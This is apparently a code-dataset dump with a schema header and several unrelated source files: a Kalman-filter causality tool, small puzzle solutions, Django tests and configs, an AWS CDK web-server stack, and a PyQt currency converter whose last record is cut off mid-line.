blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
5
283
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
41
license_type
stringclasses
2 values
repo_name
stringlengths
7
96
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
58 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
12.7k
662M
star_events_count
int64
0
35.5k
fork_events_count
int64
0
20.6k
gha_license_id
stringclasses
11 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
43 values
src_encoding
stringclasses
9 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
7
5.88M
extension
stringclasses
30 values
content
stringlengths
7
5.88M
authors
sequencelengths
1
1
author
stringlengths
0
73
35c79bd5bff7a7463816fcbb46640eb7cb4d5b5f
272c1920e168c41bc48d10b8d82cd22aa6d82fc7
/tools/core_tools_WGCI.py
bf6b60658c9e52f1bcf199a9f8371989c2bbe863
[ "MIT" ]
permissive
passion4energy/Kalman-Filter
e3facd79140d15b3fbeee09b37c4a2c985ac480c
1f4b567fdf9b6465d27ffcaba8da8404f3f80c62
refs/heads/master
2022-03-21T09:48:53.432907
2019-12-10T07:27:38
2019-12-10T07:27:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,980
py
"""重要工具包 计算 WGCI Copyright: ---------- Author: AutuanLiu Date: 2019/2/22 """ import numpy as np import scipy.io as sio from kalman_estimation import (Kalman4ARX, Kalman4FROLS, Selector, get_terms_matrix, get_txt_data, make_func4K4FROLS, make_linear_func, plot_term_ERR, save_3Darray, torch4FROLS, save_2Darray) def get_json_data(fname): """获取 JSON 数据 Args: fname (str): 存储 JSON 数据的文件路径和文件名 """ import ujson return ujson.load(open(fname, 'r')) def kalman4ARX_pipeline(data_type, configs, n_trial): """基于 Kalman 滤波器的各个算法的 pipeline types = ['linear', 'longlag_linear'] Args: data_type: 数据类型 configs (dict): 配置字典 n_trial: 试验次数 """ config = configs[data_type] WGCI100 = [] for trial in range(n_trial): # 计算总体情况 term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat") # get data normalized_signals = term_selector.make_selection()[0] print(f'data_type: {data_type}, trial: ### {trial+1}') # 构造 Kalman Filter kf = Kalman4ARX(normalized_signals, config['max_lag'], uc=config['uc']) # 估计系数 y_coef, A_coef = kf.estimate_coef(config['threshold']) # 总体误差 whole_y_error = np.var(kf.y_error, 0) # 子模型情况 terms_mat = sio.loadmat(f"{config['data_root']}{data_type}{config['term_path']}_WGCI{trial+1}.mat") sub1 = [] for ch in range(5): data_set = { 'normalized_signals': terms_mat['normalized_signals'], 'Hv': terms_mat['Hv'], 'Kalman_H': terms_mat['Kalman_H'][0, ch], 'terms_chosen': terms_mat['terms_chosen'][0, ch] } term_selector = Selector(data_set) # get data normalized_signals = term_selector.make_selection()[0] # 构造 Kalman Filter kf = Kalman4ARX(normalized_signals, config['max_lag'], uc=config['uc']) # 估计系数 y_coef, A_coef = kf.estimate_coef(config['threshold']) # 误差 sub_y_error = np.var(kf.y_error, 0) sub1.append(np.log(sub_y_error / whole_y_error)) WGCI100.append(np.asarray(sub1).T) mean_WGCI = np.mean(WGCI100, 0) var_WGCI = np.var(WGCI100, 0) print(f"mean_WGCI = {mean_WGCI}, var_WGCI = {var_WGCI}") fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}WGCI100.txt" save_3Darray(fname1, np.array([mean_WGCI * (mean_WGCI > 0.01), var_WGCI * (var_WGCI > 0.01)])) def kalman4FROLS_pipeline(data_type, configs, n_trial): """基于 Kalman 滤波器的各个算法的 pipeline Args: data_type: 数据类型 configs (dict): 配置字典 n_trial: 试验次数 """ config = configs[data_type] WGCI100 = [] for trial in range(n_trial): term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat") # get data normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection() print(f'data_type: {data_type}, trial: ### {trial+1}') # 构造 Kalman Filter kf = Kalman4FROLS(normalized_signals, Kalman_H=Kalman_H, uc=config['uc']) y_coef = kf.estimate_coef() print(y_coef) # 总体误差 whole_y_error = np.var(kf.y_error, 0) # 子模型情况 terms_mat = sio.loadmat(f"{config['data_root']}{data_type}{config['term_path']}_WGCI{trial+1}.mat") sub1 = [] for ch in range(5): data_set = { 'normalized_signals': terms_mat['normalized_signals'], 'Hv': terms_mat['Hv'], 'Kalman_H': terms_mat['Kalman_H'][0, ch], 'terms_chosen': terms_mat['terms_chosen'][0, ch] } term_selector = Selector(data_set) # get data normalized_signals = term_selector.make_selection()[0] # 构造 Kalman Filter kf = Kalman4FROLS(normalized_signals, Kalman_H=Kalman_H, uc=config['uc']) # 估计系数 y_coef = kf.estimate_coef() # 误差 sub_y_error = np.var(kf.y_error, 0) sub1.append(np.log(sub_y_error / whole_y_error)) WGCI100.append(np.asarray(sub1).T) mean_WGCI = np.mean(WGCI100, 0) var_WGCI = np.var(WGCI100, 0) print(f"mean_WGCI = {mean_WGCI}, var_WGCI = {var_WGCI}") fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}WGCI100.txt" save_3Darray(fname1, np.array([mean_WGCI * (mean_WGCI > 0.01), var_WGCI * (var_WGCI > 0.01)])) def torch4FROLS_pipeline(data_type, configs, n_trial): """基于 Kalman 滤波器的各个算法的 pipeline Args: data_type: 数据类型 configs (dict): 配置字典 n_trial: 试验次数 """ config = configs[data_type] WGCI100 = [] for trial in range(n_trial): term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat") # get data normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection() print(f'data_type: {data_type}, trial: ### {trial+1}') kf = torch4FROLS(normalized_signals, Kalman_H=Kalman_H, n_epoch=config['n_epoch']) y_coef = kf.estimate_coef() # 总体误差 whole_y_error = np.var(kf.y_error, 0) # 子模型情况 terms_mat = sio.loadmat(f"{config['data_root']}{data_type}{config['term_path']}_WGCI{trial+1}.mat") sub1 = [] for ch in range(5): data_set = { 'normalized_signals': terms_mat['normalized_signals'], 'Hv': terms_mat['Hv'], 'Kalman_H': terms_mat['Kalman_H'][0, ch], 'terms_chosen': terms_mat['terms_chosen'][0, ch] } term_selector = Selector(data_set) # get data normalized_signals = term_selector.make_selection()[0] # 构造 Kalman Filter kf = torch4FROLS(normalized_signals, Kalman_H=Kalman_H, n_epoch=config['n_epoch']) # 估计系数 y_coef = kf.estimate_coef() # 误差 sub_y_error = np.var(kf.y_error, 0) sub1.append(np.log(sub_y_error / whole_y_error)) WGCI100.append(np.asarray(sub1).T) mean_WGCI = np.mean(WGCI100, 0) var_WGCI = np.var(WGCI100, 0) print(f"mean_WGCI = {mean_WGCI}, var_WGCI = {var_WGCI}") fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}WGCI100.txt" save_3Darray(fname1, np.array([mean_WGCI * (mean_WGCI > 0.01), var_WGCI * (var_WGCI > 0.01)]))
039e9d24e8edc1ee061d4c9a63df92916244d2fc
4a8784c47e5382a33e90792088fa679c6f70ab92
/P1.py
f78df7fe30f2a35f1ecf73e2adbc1e6cf7dabbf2
[]
no_license
bobemv/ProjectEulerProblems
1838ecad4533896b424f611dd136db6f4c18fd90
5a3e06a47cf835610a74ad433e7e5c662ed6674a
refs/heads/master
2021-01-19T04:07:10.268057
2016-07-30T19:57:27
2016-07-30T19:57:27
64,561,757
0
0
null
null
null
null
UTF-8
Python
false
false
482
py
def sumaDivisores(n, numeros = 999): "Se calculan el numero de divisores en el" "intervalo de cierto n y se realiza el sumatorio" numDiv = numeros // n; return n*(numDiv*(numDiv+1))/2; __author__ = 'Roberto Moreno' "Solucion mala" resultado = 0; for i in range(1000): "En range(1000) va de 0 a 999" if ((i % 5) == 0) or ((i % 3) == 0): resultado += i; print resultado; "Solucion buena" print sumaDivisores(3)+sumaDivisores(5)-sumaDivisores(15);
882d5cbe8f3e470e18e8bba1a15c94b66f3461e1
81463a26ce2e320082d13429cd1cdae68612cdd9
/tetromino.py
81e2aef9993093842df07cba794e9713cb1fb42e
[]
no_license
jeonlego012/coding
a09c498bfb32b40d54a393f6c32ee6d17aec5770
178a65eb60cd1f9a4041037a168253c2d33813be
refs/heads/master
2023-04-17T22:36:03.710887
2021-05-04T14:57:38
2021-05-04T14:57:38
352,631,802
0
0
null
null
null
null
UTF-8
Python
false
false
1,226
py
def check_range(y, x) : return y>=0 and y<n and x>=0 and x<m def calculate(y, x) : max_sum = 0 for tetromino in range(19) : tempY, tempX = y, x tetro_sum = paper[y][x] for move in range(3) : moveY, moveX = tempY + tetrominoY[tetromino][move], tempX + tetrominoX[tetromino][move] if check_range(moveY, moveX) : tempY, tempX = moveY, moveX tetro_sum += paper[tempY][tempX] max_sum = max(max_sum, tetro_sum) return max_sum n, m = map(int, input().split()) paper = [list(map(int, input().split())) for _ in range(n)] tetrominoY = [[0,0,0], [0,1,0], [1,1,0], [1,0,1], [0,0,1], [1,1,1], [-1,0,0], [-1,0,0], [0,1,1], [1,1,0], [0,1,1], [1,0,0], [1,0,0], [1,0,1], [0,1,0], [0,1,0], [1,0,1], [1,1,-1], [0,-1,1]] tetrominoX = [[1,1,1], [1,0,-1], [0,0,1], [0,1,0], [1,1,-1], [0,0,0], [0,1,1], [0,-1,-1], [1,0,0], [0,0,-1], [-1,0,0], [0,1,1], [0,-1,-1], [0,-1,0], [-1,0,-1], [1,0,1], [0,1,-1], [0,0,-1], [1,0,1]] sum_list = [] for i in range(n) : for j in range(m) : sum_list.append(calculate(i, j)) print(max(sum_list))
37d200a86c845be6d5609336099e569145bc106c
9ce891fdd998efea19f79dae4ce971f6e2d74528
/tests/test_apps/test_poller/test_managment_commands/test_poll_dynamics.py
75ef46f2e0cacc6d23b73546bdbd47d07322fe95
[ "MIT" ]
permissive
uktrade/legal-basis-api
fba0876e4e2f35223afbf29e5a096e8d38f721c4
036f0defc84e485c935d93ecc77c1c2bf60e2477
refs/heads/master
2023-08-31T15:17:02.303317
2023-08-25T08:41:56
2023-08-25T08:41:56
227,385,913
4
1
MIT
2023-09-06T18:49:38
2019-12-11T14:31:55
Python
UTF-8
Python
false
false
2,535
py
import io import pytest from mixer.backend.django import mixer from server.apps.main.models import Consent, LegalBasis from server.apps.poller.management.commands import poll_dynamics class TestDynamicsCommand: pytestmark = pytest.mark.django_db def test_email_consent_creates_if_missing(self): Consent.objects.all().delete() out = io.StringIO() command = poll_dynamics.Command(stdout=out) assert Consent.objects.all().count() == 0 _ = command.email_consent assert Consent.objects.all().count() == 1 def test_email_consent_noop_if_exists(self): Consent.objects.all().delete() out = io.StringIO() mixer.blend(Consent, name="email_marketing") command = poll_dynamics.Command(stdout=out) assert Consent.objects.all().count() == 1 _ = command.email_consent assert Consent.objects.all().count() == 1 def test_should_update_exists_without_consent(self): mixer.blend( LegalBasis, key=None, phone="", key_type="email", email="[email protected]" ) out = io.StringIO() command = poll_dynamics.Command(stdout=out) assert not command._should_update("[email protected]") def test_should_update_exists_with_consent(self): Consent.objects.all().delete() out = io.StringIO() command = poll_dynamics.Command(stdout=out) c = mixer.blend(Consent, name="email_marketing") mixer.blend( LegalBasis, key=None, phone="", key_type="email", email="[email protected]", consents=c, ) assert command._should_update("[email protected]") def test_should_update_doesnt_exist(self): out = io.StringIO() command = poll_dynamics.Command(stdout=out) assert command._should_update("[email protected]") def test_should_create_exists(self): Consent.objects.all().delete() out = io.StringIO() command = poll_dynamics.Command(stdout=out) c = mixer.blend(Consent, name="email_marketing") mixer.blend( LegalBasis, key=None, phone="", key_type="email", email="[email protected]", consents=c, ) assert not command._should_create("[email protected]") def test_should_create_doesnt_exist(self): out = io.StringIO() command = poll_dynamics.Command(stdout=out) assert command._should_update("[email protected]")
ed2d8cceda1c6115ee5238065408039b818e629d
3b479ffc70ecf55508583913c66e66b3e97fe205
/mysite/urls.py
3cd96a7422e975eebc0f097a7ebf1b7efe634ee0
[]
no_license
divyavutukuri/Text-Utils
f590045f5fbb2dd0096d6cf732c009e74a0149c3
6700d58e2b904baa1dccbffa1aef36c95a10c6dc
refs/heads/master
2023-08-07T22:26:41.474476
2020-04-24T12:53:19
2020-04-24T12:53:19
258,499,241
0
0
null
2021-09-22T18:55:28
2020-04-24T11:56:00
Python
UTF-8
Python
false
false
898
py
"""mysite URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from . import views urlpatterns = [ path('admin/', admin.site.urls), path('',views.index,name='index'), path('analyze',views.analyze,name='analyze'), path('sites',views.ex1,name='sites') ]
c9b1db4e8471b7360ba7dcf6e6ef8d6a306c89dc
4e5cb79c8dcc6e78bf8cffc04ef279a2405a0236
/pyconbalkan/speaker/migrations/0001_initial.py
1b49b6a1d147dfe0c96c545f04cf0d81862628f3
[]
no_license
PythonBalkan/pyconbalkan
907a72abfc6de4ce2d254dbc1d1539a6571911f9
833deed488ba3ad2fa80ff144465a5755b5e1f15
refs/heads/master
2022-12-12T19:38:13.148694
2022-04-22T21:12:24
2022-05-02T23:16:30
127,753,413
32
24
null
2023-02-06T16:20:00
2018-04-02T12:30:08
Python
UTF-8
Python
false
false
1,225
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-04-26 21:50 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Speaker', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('active', models.BooleanField(default=False)), ('name', models.CharField(max_length=50)), ('job', models.CharField(max_length=100)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='SpeakerPhoto', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('profile_picture', models.ImageField(upload_to='static/img')), ('speaker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='speaker.Speaker')), ], ), ]
411d1702f625cb2279a9e58d45a57edae9f55cfb
f1ac2187b7a7cd603f0f24c82ff762a9d7d9035b
/cdk/web_stack.py
394940957968d54338a3069e41627d73552b329e
[]
no_license
Martin605/ITP4104-Cloud-Services-Project
e91d285cf936bda3b6016211820bb50f54c7cff2
f78e886d20242565394964509302889b573bbbf6
refs/heads/master
2020-09-29T08:50:58.355864
2020-04-23T01:19:50
2020-04-23T01:19:50
227,003,923
2
2
null
null
null
null
UTF-8
Python
false
false
24,563
py
from aws_cdk import ( aws_ec2 as ec2, aws_iam as iam, aws_logs as logs, aws_cloudformation as cloudformation, aws_elasticloadbalancingv2 as elasticloadbalancingv2, aws_ssm as ssm, core ) class WebStack(core.Stack): def __init__(self, scope: core.Construct, id: str, **kwargs) -> None: super().__init__(scope, id, **kwargs) # Parameter LatestAmiId = core.CfnParameter( self, "LatestAmiId", type="AWS::SSM::Parameter::Value<AWS::EC2::Image::Id>", default="/aws/service/ami-amazon-linux-latest/amzn-ami-hvm-x86_64-gp2" ) # S3 Bucket source_bucket = "sourcebucketname%s" % (core.Aws.ACCOUNT_ID) # Resources CloudFormationLogs = logs.LogGroup( self, 'CloudFormationLogs', retention=logs.RetentionDays('ONE_WEEK')) WebInstance1 = ec2.CfnInstance( self, 'WebInstance1', additional_info=None, affinity=None, iam_instance_profile=core.Fn.import_value("WebServerInstanceProfileOutput"), image_id=LatestAmiId.value_as_string, instance_type='t3.micro', network_interfaces=[ { "deviceIndex":"0", "groupSet": [core.Fn.import_value("WebSecurityGroupOutput")], "subnetId": core.Fn.import_value("PrivateSubnet1") } ], tags=[core.CfnTag(key="Name", value="WebServer1")], user_data=core.Fn.base64( """#!/bin/bash -ex yum update -y /opt/aws/bin/cfn-init -v --stack {StackName} --resource WebInstance1 --configsets InstallAndDeploy --region {Region} # Signal the status from cfn-init (via $?) /opt/aws/bin/cfn-signal -e $? --stack {StackName} --resource WebInstance1 --region {Region} """.format(StackName=core.Aws.STACK_NAME,Region=core.Aws.REGION) ) ) WebInstance1.cfn_options.metadata = { "AWS::CloudFormation::Authentication": { "rolebased": { "type": "S3", "buckets": [ source_bucket ], "roleName": core.Fn.import_value("WebServerRoleOutput") } }, "AWS::CloudFormation::Init": { "configSets": { "InstallAndDeploy": [ "Install", "InstallLogs", "Deploy" ] }, "Install": { "packages": { "yum": { "python36": [], "python36-devel": [], "nginx": [], "gcc": [] } }, "files": { "/etc/cfn/cfn-hup.conf": { "content": """ [main] stack={} region={} interval=1 verbose=true""".format(core.Aws.STACK_ID, core.Aws.REGION), "mode": "000400", "owner": "root", "group": "root" }, "/etc/cfn/hooks.d/cfn-auto-reloader.conf": { "content": """ [cfn-auto-reloader-hook] triggers=post.update path=Resources.WebInstance1.Metadata.AWS::CloudFormation::Init action=/opt/aws/bin/cfn-init -v --stack {} --resource WebInstance1 --configsets InstallAndDeploy --region {} runas=root""".format(core.Aws.STACK_NAME, core.Aws.REGION), "mode": "000400", "owner": "root", "group": "root" } }, "services": { "sysvinit": { "nginx": { "enabled": "true", "ensureRunning": "true" }, "cfn-hup": { "enabled": "true", "ensureRunning": "true", "files": [ "/etc/cfn/cfn-hup.conf", "/etc/cfn/hooks.d/cfn-auto-reloader.conf" ] } } }, "commands": { "01_unblock_nginx": { "command": "chkconfig nginx on" }, "02_install_xray": { "command": "curl https://s3.dualstack.us-east-2.amazonaws.com/aws-xray-assets.us-east-2/xray-daemon/aws-xray-daemon-3.x.rpm -o /tmp/xray.rpm && yum install -y /tmp/xray.rpm\n", "cwd": "/tmp", "ignoreErrors": "true" } } }, "InstallLogs": { "packages": { "yum": { "awslogs": [] } }, "files": { "/etc/awslogs/awslogs.conf": { "content": """ [general] state_file= /var/awslogs/state/agent-state [yum] file = /var/log/yum.log log_group_name = %s log_stream_name = {{hostname}} - {{instance_id}} yum.log [messages] file = /var/log/messages log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} messages.log [cfn-hup] file = /var/log/cfn-hup.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cfn-hup.log [cfn-init] file = /var/log/cfn-init.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cfn-init.log [cfn-init-cmd] file = /var/log/cfn-init-cmd.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cfn-init-cmd.log [cloud-init] file = /var/log/cloud-init.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cloud-init.log [cloud-init-output] file = /var/log/cloud-init-output.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cloud-init.log [handler] file = /var/log/handler.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} handler.log [uwsgi] file = /var/log/uwsgi.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} uwsgi.log [nginx_access] file = /var/log/nginx/access.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} nginx_access.log [nginx_error] file = /var/log/nginx/error.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} nginx_error.log """.format(CloudFormationLogs=CloudFormationLogs.log_group_name), "group": "root", "owner": "root", "mode": "000400" }, "/etc/awslogs/awscli.conf": { "content": """ [plugins] cwlogs = cwlogs [default] region = {} """.format(core.Aws.REGION), "mode": "000444", "owner": "root", "group": "root" } }, "commands": { "01_create_state_directory": { "command": "mkdir -p /var/awslogs/state" } }, "services": { "sysvinit": { "awslogs": { "enabled": "true", "ensureRunning": "true", "files": [ "/etc/awslogs/awslogs.conf" ]} } } }, "Deploy": { "sources": { "/photos": "https://s3.amazonaws.com/{}/deploy-app.zip".format(source_bucket) }, "commands": { "01_pip_uwsgi": { "command": "pip-3.6 install uwsgi", "cwd": "/photos", "ignoreErrors": "false" }, "02_pip_flask_app_requirements": { "command": "pip-3.6 install -r requirements.txt", "cwd": "/photos/FlaskApp", "ignoreErrors": "false" }, "03_stop_uwsgi": { "command": "stop uwsgi", "ignoreErrors": "true" }, "04_stop_nginx": { "command": "service nginx stop" }, "05_copy_config": { "command": "mv -f nginx.conf /etc/nginx/nginx.conf && mv -f uwsgi.conf /etc/init/uwsgi.conf", "cwd": "/photos/Deploy", "ignoreErrors": "false" }, "06_create_database": { "command": "python3 database_create_tables.py", "cwd": "/photos/Deploy", "ignoreErrors": "false" }, "07_start_uwsgi": { "command": "start uwsgi" }, "08_restart_nginx": { "command": "service nginx start" } } } } } WebInstance1.cfn_options.creation_policy = core.CfnCreationPolicy( resource_signal=core.CfnResourceSignal(timeout='PT10M')) WebInstance2 = ec2.CfnInstance( self, 'WebInstance2', additional_info=None, affinity=None, iam_instance_profile=core.Fn.import_value("WebServerInstanceProfileOutput"), image_id=LatestAmiId.value_as_string, instance_type='t3.micro', network_interfaces=[ { "deviceIndex":"0", "groupSet": [core.Fn.import_value("WebSecurityGroupOutput")], "subnetId": core.Fn.import_value("PrivateSubnet2") } ], tags=[core.CfnTag(key="Name", value="WebServer2")], user_data=core.Fn.base64( """#!/bin/bash -ex yum update -y /opt/aws/bin/cfn-init -v --stack {StackName} --resource WebInstance2 --configsets InstallAndDeploy --region {Region} # Signal the status from cfn-init (via $?) /opt/aws/bin/cfn-signal -e $? --stack {StackName} --resource WebInstance2 --region {Region} """.format(StackName=core.Aws.STACK_NAME,Region=core.Aws.REGION) ) ) WebInstance2.cfn_options.metadata = { "AWS::CloudFormation::Authentication": { "rolebased": { "type": "S3", "buckets": [ source_bucket ], "roleName": core.Fn.import_value("WebServerRoleOutput") } }, "AWS::CloudFormation::Init": { "configSets": { "InstallAndDeploy": [ "Install", "InstallLogs", "Deploy" ] }, "Install": { "packages": { "yum": { "python36": [], "python36-devel": [], "nginx": [], "gcc": [] } }, "files": { "/etc/cfn/cfn-hup.conf": { "content": """ [main] stack={} region={} interval=1 verbose=true""".format(core.Aws.STACK_ID, core.Aws.REGION), "mode": "000400", "owner": "root", "group": "root" }, "/etc/cfn/hooks.d/cfn-auto-reloader.conf": { "content": """ [cfn-auto-reloader-hook] triggers=post.update path=Resources.WebInstance1.Metadata.AWS::CloudFormation::Init action=/opt/aws/bin/cfn-init -v --stack {} --resource WebInstance2 --configsets InstallAndDeploy --region {} runas=root""".format(core.Aws.STACK_NAME, core.Aws.REGION), "mode": "000400", "owner": "root", "group": "root" } }, "services": { "sysvinit": { "nginx": { "enabled": "true", "ensureRunning": "true" }, "cfn-hup": { "enabled": "true", "ensureRunning": "true", "files": [ "/etc/cfn/cfn-hup.conf", "/etc/cfn/hooks.d/cfn-auto-reloader.conf" ] } } }, "commands": { "01_unblock_nginx": { "command": "chkconfig nginx on" }, "02_install_xray": { "command": "curl https://s3.dualstack.us-east-2.amazonaws.com/aws-xray-assets.us-east-2/xray-daemon/aws-xray-daemon-3.x.rpm -o /tmp/xray.rpm && yum install -y /tmp/xray.rpm\n", "cwd": "/tmp", "ignoreErrors": "true" } } }, "InstallLogs": { "packages": { "yum": { "awslogs": [] } }, "files": { "/etc/awslogs/awslogs.conf": { "content": """ [general] state_file= /var/awslogs/state/agent-state [yum] file = /var/log/yum.log log_group_name = %s log_stream_name = {{hostname}} - {{instance_id}} yum.log [messages] file = /var/log/messages log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} messages.log [cfn-hup] file = /var/log/cfn-hup.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cfn-hup.log [cfn-init] file = /var/log/cfn-init.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cfn-init.log [cfn-init-cmd] file = /var/log/cfn-init-cmd.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cfn-init-cmd.log [cloud-init] file = /var/log/cloud-init.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cloud-init.log [cloud-init-output] file = /var/log/cloud-init-output.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} cloud-init.log [handler] file = /var/log/handler.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} handler.log [uwsgi] file = /var/log/uwsgi.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} uwsgi.log [nginx_access] file = /var/log/nginx/access.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} nginx_access.log [nginx_error] file = /var/log/nginx/error.log log_group_name = {CloudFormationLogs} log_stream_name = {{hostname}} - {{instance_id}} nginx_error.log """.format(CloudFormationLogs=CloudFormationLogs.log_group_name), "group": "root", "owner": "root", "mode": "000400" }, "/etc/awslogs/awscli.conf": { "content": """ [plugins] cwlogs = cwlogs [default] region = {} """.format(core.Aws.REGION), "mode": "000444", "owner": "root", "group": "root" } }, "commands": { "01_create_state_directory": { "command": "mkdir -p /var/awslogs/state" } }, "services": { "sysvinit": { "awslogs": { "enabled": "true", "ensureRunning": "true", "files": [ "/etc/awslogs/awslogs.conf" ]} } } }, "Deploy": { "sources": { "/photos": "https://s3.amazonaws.com/{}/deploy-app.zip".format(source_bucket) }, "commands": { "01_pip_uwsgi": { "command": "pip-3.6 install uwsgi", "cwd": "/photos", "ignoreErrors": "false" }, "02_pip_flask_app_requirements": { "command": "pip-3.6 install -r requirements.txt", "cwd": "/photos/FlaskApp", "ignoreErrors": "false" }, "03_stop_uwsgi": { "command": "stop uwsgi", "ignoreErrors": "true" }, "04_stop_nginx": { "command": "service nginx stop" }, "05_copy_config": { "command": "mv -f nginx.conf /etc/nginx/nginx.conf && mv -f uwsgi.conf /etc/init/uwsgi.conf", "cwd": "/photos/Deploy", "ignoreErrors": "false" }, "06_create_database": { "command": "python3 database_create_tables.py", "cwd": "/photos/Deploy", "ignoreErrors": "false" }, "07_start_uwsgi": { "command": "start uwsgi" }, "08_restart_nginx": { "command": "service nginx start" } } } } } WebInstance2.cfn_options.creation_policy = core.CfnCreationPolicy( resource_signal=core.CfnResourceSignal(timeout='PT10M')) DefaultTargetGroup = elasticloadbalancingv2.CfnTargetGroup( self, 'DefaultTargetGroup', health_check_interval_seconds=15, health_check_path="/", health_check_protocol="HTTP", health_check_timeout_seconds=10, healthy_threshold_count=2, unhealthy_threshold_count=2, matcher={'httpCode': '200-299'}, port=80, protocol="HTTP", vpc_id=core.Fn.import_value("VPC"), target_group_attributes=[ {"key": "deregistration_delay.timeout_seconds", "value": "30"}], targets=[ {"id":WebInstance1.ref,"port":80}, {"id":WebInstance2.ref,"port":80} ] ) HttpListener = elasticloadbalancingv2.CfnListener( self, 'HttpListener', default_actions=[{ "type": "forward", "targetGroupArn": DefaultTargetGroup.ref }], load_balancer_arn=core.Fn.import_value("LoadBalancerArn"), port=80, protocol="HTTP")
f5c1dd7878185c0c4b4b8389012857aebf4f13cb
035b1a64a5fb1b839603ace74b2a5cf057d4cc7b
/Conversor moeda/App.py
0d57be7cf3b2e640ba8c093c2a2d255c8047c691
[ "MIT" ]
permissive
LuanFaria/Conversor_de_Moedas
c0ef20b9ca19d9c7e850f8f1e6b6ee67d4f1bfa6
6273da4739bef1427c63b6cf906b5a90239dd39b
refs/heads/main
2023-06-15T13:04:10.464329
2021-07-10T03:34:52
2021-07-10T03:34:52
384,600,166
3
0
null
null
null
null
UTF-8
Python
false
false
7,364
py
from PyQt5.QtWidgets import QApplication, QMainWindow import sys from interface import * from Coletor import * import datetime class Converter(QMainWindow, Ui_MainWindow): def __init__(self): super().__init__(None) super().setupUi(self) # Fixar o Tamanho self.setFixedSize(313, 164) # Set self.atualizar.clicked.connect(self.atualiza) self.data.setText(str(datetime.datetime.now().date().today())) self.dinheiro_1.addItems(['Dollar', 'Euro', 'Iene', 'Real']) self.dinheiro_2.addItems(['Dollar', 'Euro', 'Iene', 'Real']) self.convert.clicked.connect(self.calcular_conversor) # Travar a saida do valor_2 para não editavel. self.valor_2.setDisabled(True) # Formatação CSS self.valor_2.setStyleSheet( '* {color:#000}' # Formatação em CSS ) self.convert.setStyleSheet( '* {background: #32CD32; color:#000}' # Formatação em CSS ) self.setStyleSheet( '* {background: #E0FFFF; color:#000; font-size: 20px,}' # Formatação em CSS ) self._coletaD = 5.26 self._coletaR = 1 self._coletaI = 0.046 self._coletaE = 6.14 def atualiza(self): self._coletaD = coletar_dollar() self._coletaR = coletar_real() self._coletaI = coletar_iene() self._coletaE = coletar_euro() # Teste # self._coletaD = 1 # self._coletaR = 2 # self._coletaI = 3 # self._coletaE = 4 def calcular_conversor(self): dinheiro_input = self.dinheiro_1.currentText() dinheiro_resultado = self.dinheiro_2.currentText() try: # Real if dinheiro_input == 'Dollar' and dinheiro_resultado == 'Real': calcular = (float(self.valor_1.text()) * self._coletaD) calcular = round(calcular, 2) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Euro' and dinheiro_resultado == 'Real': calcular = (float(self.valor_1.text()) * self._coletaE) calcular = round(calcular, 2) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Iene' and dinheiro_resultado == 'Real': calcular = (float(self.valor_1.text()) * self._coletaI) calcular = round(calcular, 